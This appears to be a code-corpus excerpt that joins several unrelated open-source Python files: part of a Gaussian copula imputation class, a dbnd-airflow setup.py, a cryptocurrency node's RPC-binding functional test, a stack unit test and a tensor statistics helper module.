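# Summary of the M-step above, restated as an equation (no new behaviour):
#   Sigma_new = D^{-1/2} (Cov(Z_imp) + C) D^{-1/2},  D = diag(Cov(Z_imp) + C)
# where C is the average conditional covariance of the latent variables given
# the observed entries (accumulated as res_dict['C']/n above).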
def _sample_latent(self, Z, Z_ord_lower, Z_ord_upper, num, num_ord_updates=2):
'''
Given an incomplete Z, which has missing entries due to missing observations,
sample those missing entries using the multivariate normal assumption in the latent space.
Parameters
----------
Z: array-like of shape (nsamples, nfeatures)
Transformed latent matrix
Z_ord_upper, Z_ord_lower: array-like of shape (nsamples, nfeatures_ord)
Upper and lower bound to sample from
num_ord_updates: int, default = 2
Number of steps to take when approximating the mean and variance of the latent variables corresponding to ordinal dimensions.
Returns
-------
Z_imp_num: array-like of shape (nsamples, nfeatures, num)
The sampled latent values.
'''
n, p = Z.shape
max_workers = self._max_workers
seed = self._sample_seed
additional_args = {'num':num, 'seed':seed}
self._sample_seed += 1
has_truncation = self.has_truncation()
if max_workers ==1:
args = ('sample', Z, Z_ord_lower, Z_ord_upper, self._corr, num_ord_updates, self._ord_indices, has_truncation, additional_args)
res_dict = _latent_operation_body_(args)
Z_imp_num = res_dict['Z_imp_sample']
else:
divide = n/max_workers * np.arange(max_workers+1)
divide = divide.astype(int)
args = [('sample',
Z[divide[i]:divide[i+1]].copy(),
Z_ord_lower[divide[i]:divide[i+1]],
Z_ord_upper[divide[i]:divide[i+1]],
self._corr,
num_ord_updates,
self._ord_indices,
has_truncation,
additional_args
) for i in range(max_workers)]
Z_imp_num = np.empty((n,p,num))
with ProcessPoolExecutor(max_workers=max_workers) as pool:
res = pool.map(_latent_operation_body_, args)
for i, res_dict in enumerate(res):
Z_imp_num[divide[i]:divide[i+1],...] = res_dict['Z_imp_sample']
return Z_imp_num
def _fillup_latent(self, Z, Z_ord_lower, Z_ord_upper, num_ord_updates=2):
'''
Given an incomplete Z, which has missing entries due to missing observations,
fill up those missing entries using the multivariate normal assumption in the latent space.
Parameters
----------
Z: array-like of shape (nsamples, nfeatures)
Transformed latent matrix
Z_ord_upper, Z_ord_lower: array-like of shape (nsamples, nfeatures_ord)
Upper and lower bound to sample from
num_ord_updates: int, default = 2
Number of steps to take when approximating the mean and variance of the latent variables corresponding to ordinal dimensions.
Returns
-------
Z_imp: array-like of shape (nsamples, nfeatures)
The imputed latent values
C_ord: array-like of shape (nfeatures, nfeatures)
The conditional covariance due to ordinal truncation.
'''
n, p = Z.shape
max_workers = self._max_workers
has_truncation = self.has_truncation()
if max_workers ==1:
args = ('fillup', Z, Z_ord_lower, Z_ord_upper, self._corr, num_ord_updates, self._ord_indices, has_truncation)
res_dict = _latent_operation_body_(args)
Z_imp, C_ord = res_dict['Z_imp'], res_dict['var_ordinal']
else:
divide = n/max_workers * np.arange(max_workers+1)
divide = divide.astype(int)
args = [('fillup',
Z[divide[i]:divide[i+1]].copy(),
Z_ord_lower[divide[i]:divide[i+1]],
Z_ord_upper[divide[i]:divide[i+1]],
self._corr,
num_ord_updates,
self._ord_indices,
has_truncation
) for i in range(max_workers)]
Z_imp = np.empty((n,p))
C_ord = np.empty((n,p))
with ProcessPoolExecutor(max_workers=max_workers) as pool:
res = pool.map(_latent_operation_body_, args)
for i, res_dict in enumerate(res):
Z_imp[divide[i]:divide[i+1]] = res_dict['Z_imp']
C_ord[divide[i]:divide[i+1]] = res_dict['var_ordinal']
return Z_imp, C_ord
def _get_cond_std_missing(self, X=None, Cord=None):
'''
The conditional std of each missing location given other observation.
Parameters
----------
X: array-like of shape (nsamples,nfeatures) or None
Only its shape is used
Set to the data used for model fitting if None
Cord: array-like of shape (nfeatures, nfeatures) or None
The conditional covariance due to ordinal truncation.
Set to the returned values after model fitting if None
Returns
-------
std_cond: array-like of shape (nsamples,nfeatures)
Elementwise conditional std at each missing location. np.nan at observed locations.
'''
if Cord is None:
try:
Cord = self._latent_Cord
except AttributeError:
print(f'The model has not been fitted yet. Either fit the model first or supply Cord')
raise
if X is None:
X = self.transform_function.X
std_cond = np.zeros_like(X)
obs_loc = ~np.isnan(X)
std_cond[obs_loc] = np.nan
for i,x_row in enumerate(X):
missing_indices = np.isnan(x_row)
obs_indices = ~missing_indices
if any(missing_indices):
sigma_obs_obs = self._corr[np.ix_(obs_indices,obs_indices)]
sigma_obs_missing = self._corr[np.ix_(obs_indices, missing_indices)]
sigma_obs_obs_inv_obs_missing = np.linalg.solve(sigma_obs_obs, sigma_obs_missing)
# compute quantities
# _var = 1 - np.diagonal(np.matmul(sigma_obs_missing.T, sigma_obs_obs_inv_obs_missing))
# use einsum for faster and fewer computation
_var = 1 - np.einsum('ij, ji -> i', sigma_obs_missing.T, sigma_obs_obs_inv_obs_missing)
# When there exists valid ordinal observation, we will have self._latent_Cord[i, obs_indices].sum() positive.
if Cord[i, obs_indices].sum()>0:
_var += np.einsum('ij, j, ji -> i', sigma_obs_obs_inv_obs_missing.T, Cord[i, obs_indices], sigma_obs_obs_inv_obs_missing)
std_cond[i, missing_indices] = np.sqrt(_var)
return std_cond
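# The conditional variance computed above is the Schur complement of the
# observed block, written out for reference (no new behaviour):
#   Var(z_mis | z_obs) = 1 - Sigma_mo Sigma_oo^{-1} Sigma_om
#     + Sigma_mo Sigma_oo^{-1} diag(Cord_obs) Sigma_oo^{-1} Sigma_om
# where the second term only appears when ordinal truncation adds uncertainty.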
def _init_Z_ord(self, Z_ord_lower, Z_ord_upper, method='univariate_mean'):
"""
Initializes the observed latent ordinal values by:
if method == 'sampling':
sampling from a standard Gaussian truncated to the interval of Z_ord_lower, Z_ord_upper
if method == 'univariate_mean':
computing the mean of a standard Gaussian truncated to the interval of Z_ord_lower, Z_ord_upper
Parameters
----------
Z_ord_lower : array-like of shape (nsamples, nfeatures_ordinal)
lower range for ordinals
Z_ord_upper : array-like of shape (nsamples, nfeatures_ordinal)
upper range for ordinals
Returns
-------
Z_ord : array-like of shape (nsamples, nfeatures_ordinal)
Initial latent values for the ordinal entries: truncated-normal samples when method='sampling',
or truncated-normal means when method='univariate_mean'.
"""
Z_ord = Z_ord_lower.copy()
if Z_ord_lower.shape[1] == 0:
return Z_ord
obs_indices = ~np.isnan(Z_ord_lower)
u_lower = norm.cdf(Z_ord_lower[obs_indices])
u_upper = norm.cdf(Z_ord_upper[obs_indices])
if (u_upper-u_lower).min()<=0:
loc = np.argmin(u_upper-u_lower)
print(f'Min of upper - lower: {u_upper[loc]-u_lower[loc]:.3f}')
print(f'where upper is {u_upper[loc]:.3f} and lower is {u_lower[loc]:.3f}')
raise ValueError('Invalid lower & upper bounds for ordinal')
if u_lower.min()<0:
print(f'Min of lower: {u_lower.min():.3f}')
raise ValueError('Invalid lower & upper bounds for ordinal')
if u_upper.max()>1:
print(f'Max of upper: {u_upper.max():.3f}')
raise ValueError('Invalid lower & upper bounds for ordinal')
if method == 'sampling':
_score = self._rng.uniform(u_lower, u_upper)
Z_ord[obs_indices] = norm.ppf(_score)
else:
alpha = Z_ord_lower[obs_indices]
beta = Z_ord_upper[obs_indices]
l = len(alpha)
out = get_truncnorm_moments_vec(alpha, beta, np.zeros(l), np.ones(l), mean_only=True)
Z_ord[obs_indices] = out['mean']
return Z_ord
def _init_copula_corr(self, Z):
'''
Initialize the copula correlation matrix using the incomplete Z. First complete Z and then take its sample correlation matrix.
Parameters
----------
Z: array-like of shape (nsamples, nfeatures)
Transformed latent matrix
'''
n,p = Z.shape
# mean impute the missing continuous values for the sake of covariance estimation
Z_imp = Z.copy()
Z_imp[np.isnan(Z_imp)] = 0.0
# initialize the correlation matrix
self._corr = np.corrcoef(Z_imp, rowvar=False)
if self._verbose > 1:
_svdvals = svdvals(self._corr)
print(f'singular values of the initialized correlation has min {_svdvals.min():.5f} and max {_svdvals.max():.5f}')
################################################
#### helper functions
################################################
def _project_to_correlation(self, covariance):
"""
Projects a covariance to a correlation matrix, normalizing its diagonal entries. Only checks that the diagonal entries are positive.
Parameters
----------
covariance: array-like of shape (nfeatures, nfeatures)
Returns
-------
correlation: array-like of shape (nfeatures, nfeatures)
"""
D = np.diagonal(covariance)
if any(np.isclose(D, 0)):
raise ZeroDivisionError("unexpected zero covariance for the latent Z")
D_neg_half = 1.0/np.sqrt(D)
covariance *= D_neg_half
correlation = covariance.T * D_neg_half
return correlation
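# Worked example of the normalization above (illustrative only):
#   cov = np.array([[4.0, 1.0], [1.0, 1.0]])
#   self._project_to_correlation(cov)  # -> [[1.0, 0.5], [0.5, 1.0]]
# i.e. correlation = D^{-1/2} cov D^{-1/2} with D = diag(cov).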
def _get_scaled_diff(self, prev_sigma, sigma):
"""
Gets the scaled difference between two correlation matrices
Parameters
----------
prev_sigma: array-like of shape (nfeatures, nfeatures)
previous estimate of a matrix
sigma: array-like of shape (nfeatures, nfeatures)
current estimate of a matrix
Returns
-------
diff: float
scaled distance between the inputs
"""
diff = np.linalg.norm(sigma - prev_sigma) / np.linalg.norm(sigma)
return diff
def _preprocess_data(self, X, set_indices = True):
'''
Store column names, set variable types and change X to be a numpy array
Parameters
----------
X: array-like of shape (nsamples, nfeatures)
Input data
set_indices: bool, default=True
If True, set variable types
Returns
-------
X: numpy array of shape (nsamples, nfeatures)
Preprocessed input data
'''
if hasattr(X, 'columns'):
self.features_names = np.array(X.columns.to_list())
X = np.asarray(X)
if set_indices:
self.set_indices(X)
return X
def store_var_type(self, **indices):
'''
Store the integer based index for special variable types in self.var_type_dict.
'''
for name, values in indices.items():
if values is not None:
self.var_type_dict[name] = values
def has_truncation(self):
'''
Return if a truncated variable is present
'''
truncation = False
for name in ['lower_truncated', 'upper_truncated', 'twosided_truncated']:
if name in self.var_type_dict:
truncation = True
break
return truncation
def get_cdf_estimation_type(self, p):
'''
Return a list of str indicating the type of cdf estimation using self.var_type_dict
'''
cdf_types = np.array(['empirical'] * p, dtype = 'U20')
inverse_cdf_types = np.array(['empirical'] * p, dtype = 'U20')
for name, values in self.var_type_dict.items():
if name in ['lower_truncated', 'upper_truncated', 'twosided_truncated']:
cdf_types[values] = name
inverse_cdf_types[values] = name
return cdf_types, inverse_cdf_types
def set_indices(self, X):
'''
set variable types
'''
p = X.shape[1]
# boolean indexing
var_type = self.get_vartype_indices(X)
# if there are pre-fixed variable types, modify var_type_list to be consistent
_merged_var = var_type.copy()
for name, values in self.var_type_dict.items():
_merged_var[values] = name
_diff = _merged_var != var_type
if any(_diff):
if self._verbose > 1:
print("Caution: the user-specified variable types differ from the model's automatic decision")
loc = np.flatnonzero(_diff)
print(f'Conflicts at {loc}: user decision {_merged_var[loc]}, model decision {var_type[loc]}')
var_type = _merged_var
# indexing differentiating continuous and non-continuous
self._cont_indices = var_type == 'continuous'
self._ord_indices = ~self._cont_indices
# integer based indexing
self.cont_indices = np.flatnonzero(self._cont_indices)
self.ord_indices = np.flatnonzero(self._ord_indices)
# set
var_type_dict = defaultdict(list)
for i,x in enumerate(var_type):
var_type_dict[x].append(i)
for key,value in self.var_type_dict.items():
if key not in var_type_dict:
raise ValueError(f'User-specified variable type {key} was not assigned to any column')
new_value = var_type_dict[key]
if not set(value).issubset(set(new_value)):
print(key, set(value), set(new_value))
raise ValueError(f'Columns specified by the user as {key} were assigned a different type')
self.var_type_dict = var_type_dict
def get_vartype_indices(self, X):
"""
Determines the variable type of each column. A column is treated as continuous
when no single value accounts for at least self._min_ord_ratio of its observations; otherwise it is ordinal, possibly flagged as truncated.
Parameters
----------
X: array-like of shape (nsamples, nfeatures)
input matrix
Returns:
var_type_list: list of str of length nfeatures
The specified variable types. Each element is one of var_type_names.
"""
def is_cont_using_counts(counts):
'''
return if continuous
'''
return len(counts)>0 and counts.max()/counts.sum() < self._min_ord_ratio
def is_special_type(x):
'''
return whether the column is general-ordinal (not continuous), lower truncated, upper truncated, or two-sided truncated
'''
obs = ~np.isnan(x)
x = x[obs]
n = len(x)
uniques, counts = np.unique(x, return_counts=True)
if len(counts) == 1:
raise ValueError('Remove variables with only a single observed level.')
#below_max_ord = len(uniques) <= self._max_ord
is_ord = (counts.max()/n) >= self._min_ord_ratio
lower_truncated_thre = counts[0]/n >= self._min_ord_ratio
upper_truncated_thre = counts[-1]/n >= self._min_ord_ratio
is_lower_truncated = False
if lower_truncated_thre:
is_lower_truncated = is_cont_using_counts(counts[1:])
is_upper_truncated = False
if upper_truncated_thre:
is_upper_truncated = is_cont_using_counts(counts[:-1])
is_twoside_truncated = False
if lower_truncated_thre and upper_truncated_thre:
# test if the remaining values could be treated as continuous after removing truncated values
is_twoside_truncated = is_cont_using_counts(counts[1:-1])
assert is_twoside_truncated + is_lower_truncated + is_upper_truncated <= 1
return is_ord, is_lower_truncated, is_upper_truncated, is_twoside_truncated
def which_type(is_ord, is_lower_truncated, is_upper_truncated, is_twoside_truncated):
'''
determine the variable type
'''
if is_ord:
if is_lower_truncated:
t = 'lower_truncated'
elif is_upper_truncated:
t = 'upper_truncated'
elif is_twoside_truncated:
t = 'twosided_truncated'
else:
t = 'ordinal'
else:
t = 'continuous'
return t
ord_indices = []
lower_truncated_indices = []
upper_truncated_indices = []
twoside_truncated_indices = []
var_type_list = []
for i, col in enumerate(X.T):
is_ord, is_lower_truncated, is_upper_truncated, is_twoside_truncated = is_special_type(col)
var_type_list.append(which_type(is_ord, is_lower_truncated, is_upper_truncated, is_twoside_truncated))
var_type_list = np.array(var_type_list, dtype = 'U20')
return var_type_list
def _set_n_iter(self, converged, i):
'''
Store the number of iterations run
'''
if self._verbose>0:
if not converged:
print("Convergence not achieved at maximum iterations")
else:
print(f"Convergence achieved at iteration {i+1}")
self.n_iter_ = i+1
def _update_corr_diff(self, corr_diff, output=None):
'''
Compute and store correlation update
Parameters
----------
corr_diff: dict
Have self._corr_diff_type as keys
output: dict or None
If None, set to self.corr_diff
'''
if output is None:
to_append = self.corr_diff
else:
# TODO: also check dict names
assert isinstance(output, dict)
to_append = output
for t in self._corr_diff_type:
to_append[t].append(corr_diff[t])
def get_matrix_diff(self, sigma_old, sigma_new, type = ['F', 'S', 'N']):
'''
Return the correlation change tracking statistics, as some matrix norm of normalized matrix difference.
Support three norms currently: 'F' for Frobenius norm, 'S' for spectral norm and 'N' for nuclear norm.
User-defined norm can also be used through simple modification.
Parameters
----------
sigma_old: array-like of shape (nfeatures, nfeatures)
the estimate of the copula correlation matrix based on historical data
sigma_new: array-like of shape (nfeatures, nfeatures)
the estimate of the copula correlation matrix based on new batch data
type: list of str
a subset of {'F', 'S', 'N'}
the type of matrix norm to use for constructing test statistics.
Returns
-------
test_stats: dict
have (matrix norm type, the test statistics) as (key, value) pair.
'''
p = sigma_old.shape[0]
u, s, vh = np.linalg.svd(sigma_old)
factor = (u * np.sqrt(1/s) ) @ vh
diff = factor @ sigma_new @ factor
test_stats = {}
if 'F' in type:
test_stats['F'] = np.linalg.norm(diff-np.identity(p))
if 'S' in type or 'N' in type:
_, s, _ = np.linalg.svd(diff)
if 'S' in type:
test_stats['S'] = max(abs(s-1))
if 'N' in type:
test_stats['N'] = np.sum(abs(s-1))
return test_stats
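# Sketch of the statistic above (restated, not new behaviour): with
# F = sigma_old^{-1/2} computed from the SVD, diff = F @ sigma_new @ F equals
# the identity when nothing has changed, so the norms of (diff - I), or of its
# singular values minus one, quantify the relative change between batches.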
| 43.02796 | 309 | 0.585953 |
4a27f0991bd31104f17f258a92f228eaee27c2e7 | 3,103 | py | Python | modules/dbnd-airflow/setup.py | dmytrostriletskyi/dbnd | d4a5f5167523e80439c9d64182cdc87b40cbc48f | [
"Apache-2.0"
] | null | null | null | modules/dbnd-airflow/setup.py | dmytrostriletskyi/dbnd | d4a5f5167523e80439c9d64182cdc87b40cbc48f | [
"Apache-2.0"
] | null | null | null | modules/dbnd-airflow/setup.py | dmytrostriletskyi/dbnd | d4a5f5167523e80439c9d64182cdc87b40cbc48f | [
"Apache-2.0"
] | null | null | null | from os import path
import setuptools
from setuptools.config import read_configuration
BASE_PATH = path.dirname(__file__)
CFG_PATH = path.join(BASE_PATH, "setup.cfg")
config = read_configuration(CFG_PATH)
version = config["metadata"]["version"]
requirements_for_airflow = [
"WTForms<2.3.0", # fixing ImportError: cannot import name HTMLString at 2.3.0
"Werkzeug<1.0.0,>=0.15.0",
"psycopg2-binary>=2.7.4",
"SQLAlchemy==1.3.18", # Make sure Airflow uses SQLAlchemy 1.3.15, Airflow is incompatible with SQLAlchemy 1.4.x
"marshmallow<3.0.0,>=2.18.0",
"marshmallow-sqlalchemy<0.24.0,>=0.16.1;python_version>='3.0'",
"itsdangerous<2.0,>=0.24",
"tenacity>=4.12",
]
setuptools.setup(
name="dbnd-airflow",
package_dir={"": "src"},
install_requires=["dbnd==" + version, "packaging",],
# Only for orchestration, tracking users should install Airflow manually before DBND
# The best way to install airflow is manually with constraints beforehand.
# For example:
# pip install apache-airflow --constraint "https://raw.githubusercontent.com/apache/airflow/constraints-${AIRFLOW_VERSION}/constraints-${PYTHON_VERSION}.txt"
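# Concrete illustration (versions below are placeholders, substitute your own):
# pip install "apache-airflow==2.2.3" --constraint "https://raw.githubusercontent.com/apache/airflow/constraints-2.2.3/constraints-3.8.txt"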
extras_require=dict(
airflow_1_10_7=requirements_for_airflow + ["apache-airflow==1.10.7"],
airflow_1_10_8=requirements_for_airflow + ["apache-airflow==1.10.8"],
airflow_1_10_9=requirements_for_airflow + ["apache-airflow==1.10.9"],
airflow_1_10_10=requirements_for_airflow + ["apache-airflow==1.10.10"],
airflow_1_10_11=requirements_for_airflow + ["apache-airflow==1.10.11"],
airflow_1_10_12=requirements_for_airflow + ["apache-airflow==1.10.12"],
airflow_1_10_13=requirements_for_airflow + ["apache-airflow==1.10.13"],
airflow_1_10_14=requirements_for_airflow + ["apache-airflow==1.10.14"],
airflow_1_10_15=requirements_for_airflow + ["apache-airflow==1.10.15"],
airflow_2_0_2=[
# This is only used to build Docker image for integration tests.
"WTForms<2.3.0",
"psycopg2-binary>=2.7.4",
"apache-airflow==2.0.2",
"apache-airflow-providers-apache-spark==1.0.3",
# Airflow 2.0 installs versions 3.3.5 which has bad dependency to newer version of importlib-metadata
"Markdown==3.3.4",
],
airflow_2_2_3=[
# This is only used to build Docker image for integration tests.
"WTForms<2.3.0",
"psycopg2-binary>=2.7.4",
"apache-airflow==2.2.3",
# Airflow 2.0 installs versions 3.3.5 which has bad dependency to newer version of importlib-metadata
"Markdown==3.3.4",
"apache-airflow-providers-apache-spark",
],
airflow=requirements_for_airflow + ["apache-airflow==1.10.10"],
tests=[
# # airflow support
"dbnd_test_scenarios==" + version,
"pytest==4.5.0",
"boto3<=1.15.18",
"mock",
"sh",
],
),
entry_points={"dbnd": ["dbnd-airflow = dbnd_airflow._plugin"],},
)
| 42.506849 | 160 | 0.643248 |
4a27f12ea41bbbc50f94fda7f6ce37f2af654098 | 6,425 | py | Python | test/functional/rpc_bind.py | Jurdefur/dhb-core | 9d9d5ce6be37f07fd14c98abcfa0b3435c5d2211 | [
"MIT"
] | null | null | null | test/functional/rpc_bind.py | Jurdefur/dhb-core | 9d9d5ce6be37f07fd14c98abcfa0b3435c5d2211 | [
"MIT"
] | null | null | null | test/functional/rpc_bind.py | Jurdefur/dhb-core | 9d9d5ce6be37f07fd14c98abcfa0b3435c5d2211 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test running dhbcoind with the -rpcbind and -rpcallowip options."""
import sys
from test_framework.netutil import all_interfaces, addr_to_hex, get_bind_addrs, test_ipv6_local
from test_framework.test_framework import BitcoinTestFramework, SkipTest
from test_framework.util import assert_equal, assert_raises_rpc_error, get_rpc_proxy, rpc_port, rpc_url
class RPCBindTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.bind_to_localhost_only = False
self.num_nodes = 1
def setup_network(self):
self.add_nodes(self.num_nodes, None)
def add_options(self, parser):
parser.add_argument("--ipv4", action='store_true', dest="run_ipv4", help="Run ipv4 tests only", default=False)
parser.add_argument("--ipv6", action='store_true', dest="run_ipv6", help="Run ipv6 tests only", default=False)
parser.add_argument("--nonloopback", action='store_true', dest="run_nonloopback", help="Run non-loopback tests only", default=False)
def run_bind_test(self, allow_ips, connect_to, addresses, expected):
'''
Start a node with requested rpcallowip and rpcbind parameters,
then try to connect, and check if the set of bound addresses
matches the expected set.
'''
self.log.info("Bind test for %s" % str(addresses))
expected = [(addr_to_hex(addr), port) for (addr, port) in expected]
base_args = ['-disablewallet', '-nolisten']
if allow_ips:
base_args += ['-rpcallowip=' + x for x in allow_ips]
binds = ['-rpcbind='+addr for addr in addresses]
self.nodes[0].rpchost = connect_to
self.start_node(0, base_args + binds)
pid = self.nodes[0].process.pid
assert_equal(set(get_bind_addrs(pid)), set(expected))
self.stop_nodes()
def run_allowip_test(self, allow_ips, rpchost, rpcport):
'''
Start a node with rpcallow IP, and request getnetworkinfo
at a non-localhost IP.
'''
self.log.info("Allow IP test for %s:%d" % (rpchost, rpcport))
node_args = \
['-disablewallet', '-nolisten'] + \
['-rpcallowip='+x for x in allow_ips] + \
['-rpcbind='+addr for addr in ['127.0.0.1', "%s:%d" % (rpchost, rpcport)]] # Bind to localhost as well so start_nodes doesn't hang
self.nodes[0].rpchost = None
self.start_nodes([node_args])
# connect to node through non-loopback interface
node = get_rpc_proxy(rpc_url(self.nodes[0].datadir, 0, "%s:%d" % (rpchost, rpcport)), 0, coveragedir=self.options.coveragedir)
node.getnetworkinfo()
self.stop_nodes()
def run_test(self):
# due to OS-specific network stats queries, this test works only on Linux
if sum([self.options.run_ipv4, self.options.run_ipv6, self.options.run_nonloopback]) > 1:
raise AssertionError("Only one of --ipv4, --ipv6 and --nonloopback can be set")
self.log.info("Check for linux")
if not sys.platform.startswith('linux'):
raise SkipTest("This test can only be run on linux.")
self.log.info("Check for ipv6")
have_ipv6 = test_ipv6_local()
if not have_ipv6 and not (self.options.run_ipv4 or self.options.run_nonloopback):
raise SkipTest("This test requires ipv6 support.")
self.log.info("Check for non-loopback interface")
self.non_loopback_ip = None
for name,ip in all_interfaces():
if ip != '127.0.0.1':
self.non_loopback_ip = ip
break
if self.non_loopback_ip is None and self.options.run_nonloopback:
raise SkipTest("This test requires a non-loopback ip address.")
self.defaultport = rpc_port(0)
if not self.options.run_nonloopback:
self._run_loopback_tests()
if not self.options.run_ipv4 and not self.options.run_ipv6:
self._run_nonloopback_tests()
def _run_loopback_tests(self):
if self.options.run_ipv4:
# check only IPv4 localhost (explicit)
self.run_bind_test(['127.0.0.1'], '127.0.0.1', ['127.0.0.1'],
[('127.0.0.1', self.defaultport)])
# check only IPv4 localhost (explicit) with alternative port
self.run_bind_test(['127.0.0.1'], '127.0.0.1:32171', ['127.0.0.1:32171'],
[('127.0.0.1', 32171)])
# check only IPv4 localhost (explicit) with multiple alternative ports on same host
self.run_bind_test(['127.0.0.1'], '127.0.0.1:32171', ['127.0.0.1:32171', '127.0.0.1:32172'],
[('127.0.0.1', 32171), ('127.0.0.1', 32172)])
else:
# check default without rpcallowip (IPv4 and IPv6 localhost)
self.run_bind_test(None, '127.0.0.1', [],
[('127.0.0.1', self.defaultport), ('::1', self.defaultport)])
# check default with rpcallowip (IPv4 and IPv6 localhost)
self.run_bind_test(['127.0.0.1'], '127.0.0.1', [],
[('127.0.0.1', self.defaultport), ('::1', self.defaultport)])
# check only IPv6 localhost (explicit)
self.run_bind_test(['[::1]'], '[::1]', ['[::1]'],
[('::1', self.defaultport)])
# check both IPv4 and IPv6 localhost (explicit)
self.run_bind_test(['127.0.0.1'], '127.0.0.1', ['127.0.0.1', '[::1]'],
[('127.0.0.1', self.defaultport), ('::1', self.defaultport)])
def _run_nonloopback_tests(self):
self.log.info("Using interface %s for testing" % self.non_loopback_ip)
# check only non-loopback interface
self.run_bind_test([self.non_loopback_ip], self.non_loopback_ip, [self.non_loopback_ip],
[(self.non_loopback_ip, self.defaultport)])
# Check that with invalid rpcallowip, we are denied
self.run_allowip_test([self.non_loopback_ip], self.non_loopback_ip, self.defaultport)
assert_raises_rpc_error(-342, "non-JSON HTTP response with '403 Forbidden' from server", self.run_allowip_test, ['1.1.1.1'], self.non_loopback_ip, self.defaultport)
if __name__ == '__main__':
RPCBindTest().main()
| 49.423077 | 172 | 0.633152 |
4a27f1876c51fdb5bb1c33a71cf4d6858bd15f89 | 952 | py | Python | tests/test_stack.py | AjithPanneerselvam/algo | e73402dbcd9c0ab7856a36d3a3703a5cc2897cd2 | [
"MIT"
] | 2 | 2017-07-10T08:55:01.000Z | 2018-05-26T07:53:58.000Z | tests/test_stack.py | AjithPanneerselvam/algo | e73402dbcd9c0ab7856a36d3a3703a5cc2897cd2 | [
"MIT"
] | 5 | 2017-03-19T10:01:23.000Z | 2017-08-31T07:00:19.000Z | tests/test_stack.py | AjithPanneerselvam/algo | e73402dbcd9c0ab7856a36d3a3703a5cc2897cd2 | [
"MIT"
] | 3 | 2016-09-27T15:09:54.000Z | 2017-08-31T03:34:47.000Z | """
module test_stack
~~~~~~~~~~~~~~
Tests for the stack data structure.
:copyright: (c) 2017 by 0xE8551CCB.
:license: MIT, see LICENSE for more details.
"""
import pytest
from pyalgorithm.datastructures.stack import DequeStack, ListStack
@pytest.fixture(params=[DequeStack, ListStack])
def stack(request):
return request.param()
def test_stack(stack):
stack.push(10)
stack.push(11)
stack.push(12)
assert 12 == stack.peek()
assert 3 == len(stack)
assert stack.is_empty() is False
assert 12 == stack.pop()
assert 11 == stack.pop()
assert 10 == stack.pop()
assert stack.is_empty() is True
with pytest.raises(IndexError):
stack.pop()
stack.push(0)
stack.push(1)
assert stack.is_empty() is False
stack.clear()
assert stack.is_empty() is True
if __name__ == '__main__':
test_stack(DequeStack())
test_stack(ListStack())
| 20.255319 | 66 | 0.643908 |
4a27f356b1e35204d8213d72f0fe2873217f3413 | 7,820 | py | Python | tools/nntool/utils/stats_funcs.py | 00-01/gap_sdk | 25444d752b26ccf0b848301c381692d77172852c | [
"Apache-2.0"
] | 118 | 2018-05-22T08:45:59.000Z | 2022-03-30T07:00:45.000Z | tools/nntool/utils/stats_funcs.py | 00-01/gap_sdk | 25444d752b26ccf0b848301c381692d77172852c | [
"Apache-2.0"
] | 213 | 2018-07-25T02:37:32.000Z | 2022-03-30T18:04:01.000Z | tools/nntool/utils/stats_funcs.py | 00-01/gap_sdk | 25444d752b26ccf0b848301c381692d77172852c | [
"Apache-2.0"
] | 76 | 2018-07-04T08:19:27.000Z | 2022-03-24T09:58:05.000Z | # Copyright (C) 2020 GreenWaves Technologies, SAS
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
import math
import numpy as np
import scipy.spatial.distance as dis
STATS_BITS = [8, 16, 32]
def range_twos_complement(bits):
return (math.pow(-2, bits - 1), math.pow(2, bits - 1) - 1)
def calc_bits(*args, signed=True):
assert signed or all(arg >= 0 for arg in args), "numeric error"
if len(args) == 2:
num = np.floor(np.maximum(np.abs(args[0]), np.abs(args[1])))
else:
num = np.floor(np.abs(args[0]))
if num == 0:
return (1 if signed else 0)
return int(np.floor(np.log2(num)) + 1 + (1 if signed else 0))
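# Example (illustrative): values in [-3, 7] need floor(log2(7)) + 1 = 3
# magnitude bits plus a sign bit, so calc_bits(-3, 7) == 4, while the unsigned
# case calc_bits(7, signed=False) == 3.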
def do_stat(npa, do_bits=True, channel_dim=None, all_channel_range=None):
mean = float(np.mean(npa))
std = float(np.std(npa))
amax = float(np.amax(npa))
amin = float(np.amin(npa))
quant1_3 = np.quantile(npa, [0.25, 0.75])
iqr = quant1_3[1] - quant1_3[0]
weak_min = (npa < quant1_3[0] - 1.5 * iqr)
weak_max = (npa > quant1_3[1] + 1.5 * iqr)
strong_min = (npa < quant1_3[0] - 3 * iqr)
strong_max = (npa > quant1_3[1] + 3 * iqr)
weak_count = int((weak_min | weak_max).sum())
strong_count = int((strong_min|strong_max).sum())
if weak_count:
min_out = float(np.min(np.abs(npa[weak_min|weak_max])))
if strong_count:
max_out = float(np.max(np.abs(npa[strong_min|strong_max])))
else:
max_out = float(np.max(np.abs(npa[weak_min|weak_max])))
else:
min_out = max_out = 0
ret = {
'mean': mean,
'std': std,
'min': amin,
'max': amax,
'size': npa.size,
'wols': weak_count,
'sols': strong_count,
'min_out' : min_out,
'max_out' : max_out,
}
if do_bits:
ret['ibits'] = calc_bits(amax, amin)
# all_channel_range must not be 0
if all_channel_range and npa.size > 1:
if channel_dim is not None:
# there is no point to this if there is only one item per channel
if not all(npa.shape[axis] == 1 if axis != channel_dim else True for axis in range(len(npa.shape))):
dims = tuple(dim for dim in range(len(npa.shape)) if dim != channel_dim)
ret['avg_prec'] = np.average(np.ptp(npa, axis=dims)/all_channel_range)
else:
ret['avg_prec'] = np.ptp(npa)/all_channel_range
return ret
def astats(npa, do_bits=True, channel_dim=None, channel_details=None):
"""Extracts statistics from a tensor
"""
all_channel_range = np.ptp(npa)
ret = do_stat(npa, do_bits=do_bits, channel_dim=channel_dim, all_channel_range=all_channel_range)
if channel_details and channel_dim is not None:
idx = [slice(None) for dim in npa.shape]
channel_data = []
for channel in range(npa.shape[channel_dim]):
idx[channel_dim] = slice(channel, channel + 1)
channel_data.append(do_stat(npa[tuple(idx)], do_bits=True, all_channel_range=all_channel_range))
ret['channel_stats'] = channel_data
return ret
def max_error(orig, quant):
qerr = orig - quant
return np.max(np.abs(qerr))
